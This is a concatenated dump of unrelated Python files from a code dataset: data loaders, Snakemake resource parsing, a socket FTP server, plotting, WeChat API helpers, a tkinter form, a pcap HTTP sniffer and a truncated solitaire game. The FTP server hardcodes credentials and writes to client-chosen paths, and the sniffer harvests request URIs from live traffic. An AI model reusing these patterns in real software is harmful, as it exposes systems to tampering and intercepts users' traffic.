default_transform_v2(sz):\n tf = transforms.Compose([\n transforms.Scale(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n ])\n return tf\n\n\ndef default_transform(sz):\n tf = transforms.Compose([\n transforms.Scale(sz),\n transforms.CenterCrop(sz),\n transforms.ToTensor(),\n ])\n return tf\n\n\nclass DataLoader(data.DataLoader):\n def get_filenames(self, idx, size):\n idx_st = idx * self.batch_size\n\n return [\n self.dataset.get_filename(file_idx)\n for file_idx in range(\n idx_st,\n idx_st + size)]\n\n\nclass Dataset(data.Dataset):\n def __init__(self, input_dir, transform=None):\n self.input_dir = input_dir\n self.transform = transform\n\n self.imgs = sorted(list(glob.glob(str(\n Path(input_dir) /\n Path(\"./*.png\")))))\n\n def __getitem__(self, index):\n path = self.imgs[index]\n img = Image.open(path).convert('RGB')\n if self.transform is not None:\n img = self.transform(img)\n\n target = torch.zeros(1).long()\n return img, target\n\n def __len__(self):\n return len(self.imgs)\n\n def set_transform(self, transform):\n self.transform = transform\n\n def get_filename(self, idx):\n return Path(self.imgs[idx]).name\n","sub_path":"attack/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"460668908","text":"import re\nimport tempfile\n\n\nclass DefaultResources:\n defaults = {\n \"mem_mb\": \"max(2*input.size_mb, 1000)\",\n \"disk_mb\": \"max(2*input.size_mb, 1000)\",\n \"tmpdir\": \"system_tmpdir\",\n }\n\n bare_defaults = {\n \"tmpdir\": \"system_tmpdir\",\n }\n\n @classmethod\n def decode_arg(cls, arg):\n try:\n return arg.split(\"=\")\n except ValueError:\n raise ValueError(\"Resources have to be defined as name=value pairs.\")\n\n @classmethod\n def encode_arg(cls, name, value):\n return \"{}={}\".format(name, value)\n\n def __init__(self, args=None, from_other=None, mode=\"full\"):\n if mode == \"full\":\n self._args = dict(DefaultResources.defaults)\n elif mode == \"bare\":\n self._args = dict(DefaultResources.bare_defaults)\n else:\n raise ValueError(\"Unexpected mode for DefaultResources: {}\".format(mode))\n\n if from_other is not None:\n self._args = dict(from_other._args)\n self.parsed = dict(from_other.parsed)\n else:\n if args is None:\n args = []\n\n self._args.update(\n {name: value for name, value in map(self.decode_arg, args)}\n )\n\n def fallback(val):\n def callable(wildcards, input, attempt, threads, rulename):\n try:\n value = eval(\n val,\n {\n \"input\": input,\n \"attempt\": attempt,\n \"threads\": threads,\n \"system_tmpdir\": tempfile.gettempdir(),\n },\n )\n # Triggers for string arguments like n1-standard-4\n except NameError:\n return val\n return value\n\n return callable\n\n self.parsed = dict(_cores=1, _nodes=1)\n self.parsed.update(parse_resources(self._args, fallback=fallback))\n\n def set_resource(self, name, value):\n self._args[name] = \"{}\".format(value)\n self.parsed[name] = value\n\n @property\n def args(self):\n return [self.encode_arg(name, value) for name, value in self._args.items()]\n\n def __bool__(self):\n return bool(self.parsed)\n\n\ndef parse_resources(resources_args, fallback=None):\n \"\"\"Parse resources from args.\"\"\"\n resources = dict()\n if resources_args is not None:\n valid = re.compile(r\"[a-zA-Z_]\\w*$\")\n\n if isinstance(resources_args, list):\n resources_args = map(DefaultResources.decode_arg, resources_args)\n else:\n resources_args = resources_args.items()\n\n for res, val in resources_args:\n if not valid.match(res):\n raise ValueError(\n \"Resource definition must start with a valid identifier, but found {}.\".format(\n res\n )\n )\n try:\n val = int(val)\n except ValueError:\n if fallback is not None:\n val = fallback(val)\n else:\n raise ValueError(\n \"Resource definiton must contain an integer after the identifier.\"\n )\n if res == \"_cores\":\n raise ValueError(\n \"Resource _cores is already defined internally. Use a different name.\"\n )\n resources[res] = val\n return resources\n","sub_path":"snakemake/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"580580142","text":"#/usr/bin/python env\n#coding:utf8\n\n'''\n用户认证\n支持断点续传\n客户端支持目录切换\n客户端可以查看服务端文件(如果写不出忽略)\n'''\n\nimport socketserver\nimport os\nimport json\n\nclass MyServer(socketserver.BaseRequestHandler):\n\n def handle(self):\n # print self.request,self.client_address,self.server\n conn = self.request\n conn.sendall(bytes('欢迎使用FTP系统',encoding='utf-8'))\n #登入\n while True:\n if user_login(conn) == True:\n ftp_receive(conn)\n break\n else:\n #如果用户密码不对,继续登入\n continue\n\n\ndef user_login(conn):\n # 接收用户名密码\n data_bytes = conn.recv(1024)\n data_user_str = str(data_bytes, encoding='utf-8')\n print(data_user_str)\n conn.sendall(bytes('null', encoding='utf-8'))\n data_bytes = conn.recv(1024)\n data_passwd_str = str(data_bytes, encoding='utf-8')\n print(data_passwd_str)\n # 判断用户密码\n if data_user_str == 'darren' and data_passwd_str == \"123\":\n conn.sendall(bytes('登入成功', encoding='utf-8'))\n return True\n else:\n conn.sendall(bytes('登入失败', encoding='utf-8'))\n return False\n\ndef ftp_receive(conn):\n while True:\n data = conn.recv(1024)\n data_str = str(data,encoding='utf-8')\n print(data_str)\n hander,file_size_str,file_path,file_status,file_dir_list = data_str.split('|')\n file_size_int = int(file_size_str)\n print(hander, file_size_int, file_path,file_status)\n if hander == \"file\":\n #发送消息告诉客户端要开始发送\n conn.sendall(bytes(\"server-respone\",encoding='utf-8'))\n\n #如果是单文件\n if file_status == \"no\":\n with open(file_path, 'wb') as f:\n while file_size_int >=0:\n #print(file_size_int)\n # 接收文件\n data = conn.recv(1024)\n f.write(data)\n file_size_int -= 1024\n if os.path.getsize(file_path) == int(file_size_str):\n print(\"%s 文件接收完毕\" % file_path)\n conn.sendall(bytes('发送完成 %s' % file_path, encoding='utf-8'))\n continue\n #如果是目录下的多文件\n elif file_status == \"yes\":\n #按文件路径依次\n with open(file_path,'wb') as f:\n while file_size_int >0:\n # 接收文件\n data = conn.recv(1024)\n f.write(data)\n file_size_int -= 1024\n if os.path.getsize(file_path) == int(file_size_str):\n print(\"%s 文件接收完毕\"%file_path)\n conn.sendall(bytes('发送完成 %s'%file_path,encoding='utf-8'))\n continue\n elif hander == \"dir\":\n os.mkdir(file_path)\n file_path_list = json.loads(file_dir_list)\n for dir in file_path_list:\n os.mkdir(dir)\n conn.sendall(bytes('目录创建完成 %s' % file_path, encoding='utf-8'))\nif __name__ == '__main__':\n server = socketserver.ThreadingTCPServer(('127.0.0.1',8000),MyServer)\n server.serve_forever()","sub_path":"stu02-ftp/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"604409234","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(19680801)\n\n# example data\nmu = 100 # mean of distribution\nsigma = 15 # standard deviation of distribution\nx = mu + sigma * np.random.randn(400)\n\nnum_bins = 100\n\nfig, ax = plt.subplots()\n\n# histogram on data\nn, bins, patches = ax.hist(x, num_bins, density=1)\n\nplt.show()","sub_path":"Visualization/Matplotlib/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"109386033","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport urllib2\nimport json\nfrom oauth import get_token\n\nfrom http import post_request, get_request\n\n\n\ndef get_userid(openid):\n token = get_token()\n url = \"https://qyapi.weixin.qq.com/cgi-bin/user/convert_to_userid?access_token=%s\"%token\n data = {\"openid\": openid}\n response = post_request(url, **data)\n return response\n\n\ndef get_userinfo(userid):\n token = get_token()\n url = \"https://qyapi.weixin.qq.com/cgi-bin/user/get?access_token={0}&userid={1}\".format(token, userid)\n response = get_request(url)\n return response\n\"\"\"\n{\n \"errcode\": 0,\n \"errmsg\": \"ok\",\n \"userid\": \"zhangsan\",\n \"name\": \"李四\",\n \"department\": [1, 2],\n \"position\": \"后台工程师\",\n \"mobile\": \"15913215421\",\n \"gender\": \"1\",\n \"email\": \"zhangsan@gzdev.com\",\n \"weixinid\": \"lisifordev\", \n \"avatar\": \"http://wx.qlogo.cn/mmopen/ajNVdqHZLLA3WJ6DSZUfiakYe37PKnQhBIeOQBO4czqrnZDS79FH5Wm5m4X69TBicnHFlhiafvDwklOpZeXYQQ2icg/0\",\n \"status\": 1,\n \"extattr\": {\"attrs\":[{\"name\":\"爱好\",\"value\":\"旅游\"},{\"name\":\"卡号\",\"value\":\"1234567234\"}]}\n}\n\"\"\"\n\ndef get_member_all(department_id, fetch_child = 0, status=1):\n token = get_token()\n url = \"https://qyapi.weixin.qq.com/cgi-bin/user/list?access_token={0}&department_id={1}&fetch_child={2}&status={3}\".format(token, department_id, fetch_child, status)\n response = get_request(url)\n return response\n\n\ndef get_member(department_id, fetch_child = 0, status=1):\n token = get_token()\n url = \"https://qyapi.weixin.qq.com/cgi-bin/user/simplelist?access_token={0}&department_id={1}&fetch_child={2}&status={3}\".format(token, department_id, fetch_child, status)\n response = get_request(url)\n return response\n","sub_path":"approval/sdk/member.py","file_name":"member.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"598629270","text":"\"\"\"\n##################################################################\nмногократно используемый класс формы, задействованный\nв сценарии getfilegui (и в других)\n##################################################################\n\"\"\"\n\nfrom tkinter import *\n\n\nclass Form: # немодальное окно формы\n def __init__(self, labels, parent=None): # передать список меток полей\n self.entry_size = 40\n self.label_size = max(len(x) for x in labels) + 2\n box = Frame(parent) # в окне есть ряды, кнопка\n box.pack(expand=YES, fill=BOTH) # ряды оформлены, как фреймы\n rows = Frame(box, bd=2, relief=GROOVE) # нажатие кнопки или Enter\n rows.pack(side=TOP, expand=YES, fill=X) # вызывают метод on_submit\n self.content = {}\n for label in labels:\n row = Frame(rows)\n row.pack(fill=X)\n Label(row, text=label, width=self.label_size).pack(side=LEFT)\n entry = Entry(row, width=self.entry_size)\n entry.pack(side=RIGHT, expand=YES, fill=X)\n self.content[label] = entry\n Button(box, text=\"Cancel\", command=self.on_cancel).pack(side=RIGHT)\n Button(box, text=\"Submit\", command=self.on_submit).pack(side=RIGHT)\n box.master.bind(\"\", lambda event: self.on_submit())\n self.box = box\n\n def on_submit(self): # переопределить этот метод в подклассах\n for key in self.content:\n print(key, '\\t=>\\t', self.content[key].get().lstrip())\n\n def on_cancel(self): # переопределить этот метод в подклассах\n self.box.master.quit()\n\n\nclass DynamicForm(Form):\n def __init__(self, labels=None, parent=None):\n labels = input(\"Enter field names: \").split()\n super(DynamicForm, self).__init__(labels, parent)\n\n def on_submit(self):\n print(\"Field values...\")\n super(DynamicForm, self).on_submit()\n self.on_cancel()\n\n\nif __name__ == \"__main__\":\n import sys\n root = Tk()\n if len(sys.argv) == 1:\n Form([\"Name\", \"Age\", \"Job\"], root) # предопределенные поля остаются после передачи\n else:\n DynamicForm(root) # динамически созданные поля ичезают\n root.mainloop()\n","sub_path":"dev/Internet/Sockets/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"460296882","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n\nimport pcap\nimport dpkt\nimport multiprocessing\n\nclass datapacketscan():\n def __init__(self,host,queue):\n self.host = host\n self.pack=pcap.pcap('eth0')\n self.pack.setfilter('tcp port 80')\n self.queue = multiprocessing.Queue()\n self.queue = queue\n\n def data_analyse(self):\n for ptime,pdata in self.pack:\n p=dpkt.ethernet.Ethernet(pdata)\n if p.data.data.__class__.__name__=='TCP':\n if p.data.data.dport==80 and len(p.data.data.data) > 0:\n http = dpkt.http.Request(p.data.data.data)\n if http.headers['host'] == self.host:\n #print p.data.data.data\n self.queue.put(http.uri)\n \n\n\n","sub_path":"lib/Capture_detection.py","file_name":"Capture_detection.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"76454000","text":"import xmltodict\n#map key:\n# x = wall\n# exit types:\n# 0 = combat door\n# 1 = puzzle door\n# 2 = timing/dexterity door\n# 3 = tower exit door\ndef digest(path):\n raw = xmltodict.parse(open(path,'r').read())['ax']\n rows = raw.split()\n dig = []\n \n for d in range(20):\n dig.append(list(rows[d]))\n \n return dig\n\nclass Map:\n def __init__(self,dig):\n self.dig = dig","sub_path":"libraries/mapdigest.py","file_name":"mapdigest.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"44790032","text":"# -*- coding: utf-8 -*-\nimport pygame\nfrom pygame.locals import *\nimport sys\nimport random\nimport pygame.image\nimport pygame.rect\nimport os.path\nimport Reglur\nfrom Spilastokkur import*\n\n\ndef cardNames():\n s = Spilastokkur()\n cards = s\n return cards\n \n \n\n '''\n for card_num in range(1, 14) :\n for card_suit in suits :\n str_card = str(card_num) if card_num > 9 else '0' + str(card_num)\n cards.append(card_suit + str_card)\n '''\n\nclass Stillingar:\n myndir_nofn = cardNames()\n mynd_path = \"Myndir/\"\n mynd_gerd = \".jpg\"\n mynd_bakhlid = 'Bakhlid'\n mynd_botn = 'bottom03'\n mynd_upplausn = (124, 174)\n upphafs_bil = 10\n rod_bil = 60\n margin_bil = 100\n tile_small_space = 20\n tile_large_space = 15\n double_speed = 500\n \ndef loadImage(name):\n image = pygame.image.load(os.path.join(Stillingar.mynd_path, str(name) + Stillingar.mynd_gerd))\n return image.convert_alpha()\n\n\n#Basic class on which all the other classes will depend\nclass AbstractObject(object):\n def __init__(self, name, pos):\n #Name of the object\n self.name = name\n #It's position and area (starts of as a 0 dimensional rect)\n self.rect = pygame.Rect(pos[0], pos[1], 0, 0) \n\n #Checks if a x, y position is in the object\n def hasPosition(self, pos) :\n if not self.visible : return False\n return self.rect.collidepoint(pos)\n\n def hasCollision(self, obj) :\n return self.rect.colliderect(obj.rect)\n\n #Just returns the x, y position of self.rect\n def getPosition(self) :\n return (self.rect.x, self.rect.y)\n\n #Moving objects might not be as easy as chaing rect.x, so use subclass this if necessary\n def setPosition(self, pos) :\n self.rect.x, self.rect.y = pos[0], pos[1]\n\n def movePosition(self, move) :\n self.rect.move_ip(move)\n\n\n#An object that has an image associated with it\n#Can be made invisible\nclass AbstractImage(AbstractObject) :\n def __init__(self, name, pos, image) :\n AbstractObject.__init__(self, name, pos)\n #All objects have an image (surface) associated with them.\n self.image = self.setImage(image) \n #Will this object be drawn (allows me to easily hide objects, rather than move rect off-screen)\n self.visible = True\n\n #The simple draw function that needs subclassed to be usefull\n def draw(self, screen) :\n if self.visible :\n screen.blit(image, self.rect)\n\n #Each object is associated with an image. As soon as the image is loaded, the self.rect attribute needs to be updated\n def setImage(self, image) :\n loaded = loadImage(image)\n self.rect.w, self.rect.h = loaded.get_width(), loaded.get_height()\n return loaded\n\n\n#The basic container for cards. Subsequent piles will subclass it \n#The image represents the empty pile\nclass AbstractPile(AbstractImage) :\n\n def __init__(self, name, pos, image, cards = []) :\n AbstractImage.__init__(self, name, pos, image)\n self.cards = []\n self.addCards(cards)\n\n #Are there any cards in the pile?\n def isEmpty(self) : \n if self.cards : return False\n return True\n\n #How many cards are in the pile\n def cardNum(self) : return len(self.cards)\n\n #Turns all the cards in the pile faceup or facedown\n def allFaceUp(self, boolean) :\n for card in self.cards :\n card.faceUp = boolean\n\n #Draws the bottom symbol stored in self.image (generally used to show an empty pile)\n def drawBottom(self, screen) :\n screen.blit(self.image, self.rect)\n\n #Remove cards from the top of the pile (end of the list)\n def takeCards(self, num) :\n if num > self.cardNum() or num < 0 : raise IndexError\n break_point = self.cardNum() - num\n to_take = self.cards[break_point : ] #Cards that are taken\n self.cards = self.cards [ : break_point] #Cards that remain\n return to_take\n\n def takeAll(self) :\n return self.takeCards(self.cardNum())\n\n #The setPosition function moves all the cards, rather than setting the position directly\n #This allows tiled piles to be set correctly, as using setPosition directly would make the tiled pile into simple pile \n def setPosition(self, pos) :\n x_move = pos[0] - self.rect.x\n y_move = pos[1] - self.rect.y\n\n super(AbstractPile, self).setPosition(pos)\n for card in self.cards : card.movePosition((x_move, y_move))\n\n def movePosition(self, move) :\n super(AbstractPile, self).movePosition(move)\n for card in self.cards : card.movePosition(move)\n\n #Simple function that takes cards and puts them back\n def returnCards(self, cards) :\n self.addCards(cards)\n\n #The rest of the functions need to be subclassed\n #Add a list of cards to the end of this pile. This is used to populate the pile originally\n def addCards(self, cards) :\n raise NotImplementedError\n\n def draw(self, screen) :\n raise NotImplementedError\n\n\n#This is the abstract class for a pile where all the cards are exactly on top of each other\n#It is fully functional if you want to just display this pile, but cannot be interacted with by user\nclass AbstractSimplePile(AbstractPile) :\n def __init__(self, name, pos, image, cards = []) :\n AbstractPile.__init__(self, name, pos, image, cards)\n\n #The draw call does not draw all the cards in the pile\n #Only the top card is drawn, as it hides all the other cards\n def draw(self, screen) :\n if not self.visible : return\n\n if self.isEmpty():\n self.drawBottom(screen)\n\n else :\n self.cards[-1].draw(screen)\n\n #Can a cards be added to this pile by the user (for this class, always no)\n def validAddCards(self, pile) :\n return False\n\n #Add a single card (the card keeps track of where it was last added)\n def addSingle(self, card) :\n card.setPosition((self.rect.x, self.rect.y))\n card.pile = self\n self.cards.append(card)\n\n #Add cards to this pile\n #If you just want to know if cards could be added by user, run validAddPile\n def addCards(self, cards) :\n for card in cards : self.addSingle(card)\n\n\n#The cards are now spread out vertically (with the last card in the list at the top)\n#The tile pile has two spacings between cards\n#init_space for the spacing when the pile is just created and add_space for the spacing when new cards are added\nclass AbstractTilePile(AbstractPile):\n def __init__(self, name, pos, image, init_space, add_space, cards = []) :\n self.init_space = init_space\n self.add_space = add_space*1.6\n AbstractPile.__init__(self, name, pos, image, cards)\n\n def draw(self, screen) :\n if not self.visible : return\n if self.isEmpty(): self.drawBottom(screen)\n for card in self.cards : card.draw(screen)\n\n #Can a cards be added to this pile by the user (for this class, always no)\n def validAddCards(self, pile) :\n return False\n\n #This function is a little strained as it has to determine if a card is being added by the user\n #Or if cards are being returned to a pristine tiled pile\n #This is to ensure that the tile spacing does arbitarily switch\n def addSingle(self, card) :\n if self.isEmpty() :\n card.setPosition((self.rect.x, self.rect.y))\n else :\n last_card = self.cards[-1]\n #If the last card is faceUp, add the card with add_space spacing\n if last_card.faceUp : card.setPosition((last_card.rect.x, last_card.rect.y + self.add_space))\n #If the last card is faceDown, it means the card should be added with the init_space\n else : card.setPosition((last_card.rect.x, last_card.rect.y + self.init_space))\n\n card.pile = self\n self.cards.append(card)\n self.updateArea() #Don't forget to update the new area\n\n #Add cards to this pile\n #If you just want to know if cards could be added by user, run validAddPile\n def addCards(self, cards) :\n for card in cards : self.addSingle(card)\n\n #The rect area actually gets bigger as more cards are added, so it needs to be updated\n def updateArea(self) :\n if self.isEmpty() : \n ref = self.image.get_rect()\n self.rect.h= ref.h\n\n else : #The hight of the tiled pile is simply the difference between the top of first and bottom of last card\n bottom = self.cards[-1].rect.bottom\n top = self.cards[0].rect.top\n self.rect.h = bottom - top\n\n #Remove cards from the top of the pile (end of the list)\n #Had to be subclassed to ensure the area is correctly updated\n def takeCards(self, num) :\n result = super(AbstractTilePile, self).takeCards(num)\n self.updateArea()\n return result\n\n#A abstract class that can hold multiple piles if those piles need to talk to each other\n#It does not have an image by itself, so self.rect has no dimension\n#Which means that hasPosition has to be subclassed to allow user interaction and define pile interactions\nclass AbstractMultiPile(AbstractObject) :\n def __init__(self, name, pos, space) :\n AbstractObject.__init__(self, name, pos)\n self.space = space\n self.piles = []\n\n #Each added pile is spaced by self.space from the previous pile\n def setupPile(self, new_pile) :\n displace = 0\n for pile in self.piles :\n displace += pile.rect.width + self.space \n new_pile.setPosition((self.rect.x + displace, self.rect.y))\n self.piles.append(new_pile)\n\n #Is a pile located at that position (return None if there is nothing)\n def getPile(self, pos) :\n for pile in self.piles :\n if pile.hasPosition(pos) : return pile\n\n def hasPosition(self, pos) :\n if self.getPile(pos) : return True\n return False\n\n def movePosition(self, move) :\n for pile in self.piles :\n pile.movePosition(move)\n\n def draw(self, screen) :\n for pile in self.piles :\n pile.draw(screen)\n \nclass Card(AbstractImage) :\n #The back of card image is stored here (it is the same for all cards)\n #Set if with self.loadBack()\n back_of_card = None\n\n #As static members are loaded before __main__ I cannot load the back_of_card image right away\n #This is because abstract.loadImage() calls a pygame function (convert_alpha) that requires pygame.init() to be called\n #This static function can be called to load the back_of_card image\n @staticmethod\n def loadBack(name) :\n Card.back_of_card = loadImage(name)\n\n #The two colors of the cards\n RED = 1\n BLACK = 2\n\n def __init__(self, name, pos) :\n #The name of the card is 01-13[cdhs]\n #Notice that the image for the card is specified by its name\n AbstractImage.__init__(self, name, pos, name)\n \n\n #Sometimes it is necessary to keep track of what pile a card is in\n self.pile = None\n\n self.faceUp = True\n\n def getNumber(self): int(self.name[-2:])\n \n def getSuit(self): return self.name[0]\n\n def getColor(self) :\n if self.getSuit() == 't' or self.getSuit() == 'h' : return Card.RED\n else: return Card.BLACK\n\n def sameColor(self, card) :\n return self.getColor() == card.getColor()\n\n def draw(self, screen) :\n if self.visible :\n image = self.image if self.faceUp else Card.back_of_card\n screen.blit(image, self.rect)\n\n#Encodes the draw and discard pile of the game\n#The left draw pile if face down and upon click moves the top card onto the right discard pile faceup\n#If the draw pile is empty, it takes all the cards from the discard pile\nclass StartPile(AbstractMultiPile) :\n DRAW = 0\n DISCARD = 1\n\n def __init__(self, name, pos, space, bottom, cards = []) :\n AbstractMultiPile.__init__(self, name, pos, space)\n self.setupPile(self.setupDraw(cards, bottom))\n self.setupPile(self.setupDiscard(bottom))\n\n #For the two setup functions, the position does not matter, as the setupPile function will correctly position the piles\n def setupDraw(self, cards, bottom) :\n draw_pile = AbstractSimplePile('Draw', (0,0), bottom, cards)\n draw_pile.allFaceUp(False)\n return draw_pile\n\n def setupDiscard(self, bottom) :\n discard_pile = AbstractSimplePile('Discard', (0,0), bottom)\n return discard_pile\n\n # If the draw pile is clicked \n def drawUpClick(self) :\n if not self.piles[StartPile.DRAW].isEmpty() : \n take_cards = self.piles[StartPile.DRAW].takeCards(1) #If the pile is not empty, get the top most card\n take_cards[0].faceUp = True\n self.piles[StartPile.DISCARD].addCards(take_cards) #Add the card to discard\n\n else : #Otherwise, move all the cards from discard to draw and but them facedowm\n self.piles[StartPile.DISCARD].allFaceUp(False)\n all_cards = self.piles[StartPile.DISCARD].takeAll()\n all_cards.reverse()\n self.piles[StartPile.DRAW].addCards(all_cards)\n\n #On click\n def onClick(self, event) :\n clicked_pile = self.getPile(event.pos)\n\n if not clicked_pile : return #Sanity check, just in case onClick was called accidentaly\n if not clicked_pile.visible: return\n\n if event.type == MOUSEBUTTONUP and event.button == 1 :\n if clicked_pile.name == 'Draw' : \n self.drawUpClick()\n\n #Discard pile just returns the top card in a pile\n if event.type == MOUSEBUTTONDOWN and event.button == 1 :\n if clicked_pile.name == 'Discard' and not clicked_pile.isEmpty(): return clicked_pile.takeCards(1)\n\n #Double click is always MOUSEUP.\n #For the draw pile, does the same as single click\n #THe discard pile does not respond to single up clicks, but the double click takes the top card\n def onDoubleClick(self, event) :\n clicked_pile = self.getPile(event.pos)\n if not clicked_pile : return #Sanity check, just in case onClick was called accidentaly\n if not clicked_pile.visible: return\n\n if clicked_pile.name == 'Draw' : self.drawUpClick()\n if clicked_pile.name == 'Discard' and not clicked_pile.isEmpty() : return clicked_pile.takeCards(1)\n\n #Can cards be added to any of the piles\n def validAddCards(self, cards) :\n return False\n\n\n\n#The 7 tiled piles that make up the main playing field\nclass MainPile(AbstractTilePile) :\n def __init__(self, name, pos, image, init_space, add_space, cards = []) :\n self.pileSetup(cards)\n AbstractTilePile.__init__(self, name, pos, image, init_space, add_space, cards)\n\n #All but the last card in the pile is facedown\n def pileSetup(self, cards) :\n for card in cards : card.faceUp = False\n if cards: cards[-1].faceUp = True\n\n #This function returns the top most card on the deck that was clicked\n #If no card was clicked, returns -1\n def topCardClicked(self, pos) :\n result = -1\n for i, card in enumerate(self.cards) :\n if card.hasPosition(pos) : result = i\n\n return result\n\n def onClick(self, event) :\n if not self.visible : return\n\n #When clicked down, return all the cards including and after the card clicked\n if event.type == MOUSEBUTTONDOWN and event.button == 1 :\n card_clicked = self.topCardClicked(event.pos)\n if card_clicked != -1 and self.cards[card_clicked].faceUp:\n cards_to_take = self.cardNum() - card_clicked\n return self.takeCards(cards_to_take)\n\n #If the last card in the pile if face down, an upclick will turn in around\n if event.type == MOUSEBUTTONUP and event.button == 1 :\n if not self.isEmpty() and self.cards[-1].hasPosition(event.pos) :\n self.cards[-1].faceUp = True\n\n #Returns the last card in the pile if it is faced up and has been clicked\n def onDoubleClick(self, event) :\n if not self.visible : return\n\n card_clicked = self.topCardClicked(event.pos)\n if card_clicked != -1 and self.cards[card_clicked].faceUp and card_clicked == self.cardNum() - 1:\n return self.takeCards(1)\n\n #can these cards be added to this pile by the user\n #We only care about the first card in cards\n #implicit assumption is that the rest of the program makes sure the order of the cards remains valid\n def validAddCards(self, cards) :\n #Only a king can be added to an empty pile\n if self.isEmpty() :\n if cards[0].getNumber() == 13 and self.hasCollision(cards[0]) : \n return True\n else:\n ref_card = self.cards[-1] # The top most card of the pile determines validity\n if not ref_card.faceUp : #Card must be faceup to be seen when it is added to\n return False \n\n if not ref_card.sameColor(cards[0]) and ref_card.getNumber() == cards[0].getNumber() + 1 :\n if ref_card.hasCollision(cards[0]) : \n return True\n\n return False\n\n\n#A simple pile that only allows addition of one card with increasing value with the same suit\n#When empty, can accept only aces (the ace added will determine the suit)\n#Keeps track of how many cards have been added to any SuitPile (for the win condition of 52)\nclass SuitPile(AbstractSimplePile) :\n total_cards = 0\n\n def __init__(self, name, pos, image) :\n AbstractSimplePile.__init__(self, name, pos, image)\n\n #validAddCards has to be expended\n #If contact is true, the added card must be in touch with the suit pile\n #This matters because double clicking a card can directly move it to a suit pile\n def validAddCards(self, cards, contact = True) :\n if contact : \n if not self.hasCollision(cards[0]): return False\n if len(cards) != 1 : return False\n\n if self.isEmpty() :\n if cards[0].getNumber() == 1: return True\n return False\n\n ref_card = self.cards[-1]\n if ref_card.getSuit() == cards[0].getSuit() and ref_card.getNumber() + 1 == cards[0].getNumber() :\n return True\n return False\n\n #On click\n def onClick(self, event) :\n if not self.visible : return False\n\n if event.type == MOUSEBUTTONDOWN and event.button == 1 :\n if not self.isEmpty(): return self.takeCards(1)\n\n def onDoubleClick(self, event) :\n pass\n\n #To keep track of the total number of cards in SuitPiles, add and take card function need to be expanded\n def takeCards(self, num) :\n cards_taken = super(SuitPile, self).takeCards(num)\n SuitPile.total_cards -= num\n return cards_taken\n\n def addSingle(self, card) :\n super(SuitPile, self).addSingle(card)\n SuitPile.total_cards += 1\n\n#This class allows for cards to be easily moved around\n#It takes cards from a pile and keeps them in the same relative positions while they are moved around\n#It also keeps track of where the cards came from and can return it if necessary\nclass Repository(object) :\n def __init__(self, name) :\n self.name = name\n self.cards = []\n self.source = None\n\n def addCards(self, cards) :\n if self.source or self.cards : raise Exception\n if cards :\n self.cards = cards\n self.source = cards[0].pile\n\n def hasCards(self) : \n if self.cards : return True\n return False\n\n def clear(self) :\n self.cards = []\n self.source = None\n\n def returnCards(self) :\n self.source.addCards(self.cards)\n self.clear()\n\n #Move the card to the pile (please check if the move if valid first)\n def addToPile(self, pile) :\n pile.addCards(self.cards)\n self.clear()\n \n def draw(self, screen) :\n for card in self.cards : card.draw(screen)\n\n def movePosition(self, move) :\n for card in self.cards : card.movePosition(move)\n \nclass DoubleClick :\n def __init__(self) :\n self.double_click = pygame.time.Clock()\n self.time = 0 #Necessary to temporary store time passed after checking second down click\n self.first_click = True #Is this the first click in the double click\n self.wasDC = False #Was the alst call to isDC() a double click\n\n #Implementing double click was a lot harder than initially thought\n #A double click starts on a mouse down and ends on the second mouse up\n #If there is too much time between the first and second mouse down, the second mouse down will be treated as a first\n def isDC(self, event) :\n if event.type == MOUSEBUTTONDOWN and event.button == 1 :\n click_time = self.double_click.tick() #Check how long since last click\n if not self.first_click : #If it's the first click, exit function with False\n #If it's the second downclick, make sure that a double click is still a possibility \n #If not, make this down click the first click\n #Since tick() was called, store time passed in self.time, to be added to the upclick later\n if click_time > Stillingar.double_speed : self.first_click = True\n else : self.time = click_time\n\n if event.type == MOUSEBUTTONUP and event.button == 1 :\n if not self.first_click : #If it's the second click\n click_time = self.double_click.tick() #Get time since last click (the second down click)\n self.first_click = True #The next click will again be first\n if click_time + self.time < Stillingar.double_speed : #Add the click_time and self.time and check if fast enough\n self.wasDC = True \n return True\n else : self.first_click = False #If it was first first upclick, now the second_click is expected\n #If we get to here, no double click was detected \n self.wasDC = False\n return False\n\n\nclass Game :\n def __init__(self) :\n pygame.init()\n random.seed()\n\n self.screen = self.setDisplay() #Display dimensions\n self.double_click = DoubleClick() #Double click checker\n self.move_pile = Repository('Repository') #For moving piles\n\n self.cards = self.loadCards() #All the cards\n self.piles = self.populatePiles() #All the piles\n\n #The display dimensions are calculated given the wanted margins and card dimensions\n def setDisplay(self) :\n x_dim = (Stillingar.margin_bil * 2) + (Stillingar.mynd_upplausn[0] * 7) + (Stillingar.upphafs_bil * 6)\n y_dim = Stillingar.margin_bil + (Stillingar.mynd_upplausn[1] * 2) + Stillingar.rod_bil\n y_dim += (Stillingar.tile_small_space * 6) + (Stillingar.tile_large_space * 12)\n return pygame.display.set_mode((x_dim, y_dim))\n\n #Load the cards (the common card back and the card images)\n def loadCards(self) :\n Card.loadBack(Stillingar.mynd_bakhlid)\n cards = [Card(x, (0, 0)) for x in Stillingar.myndir_nofn]\n 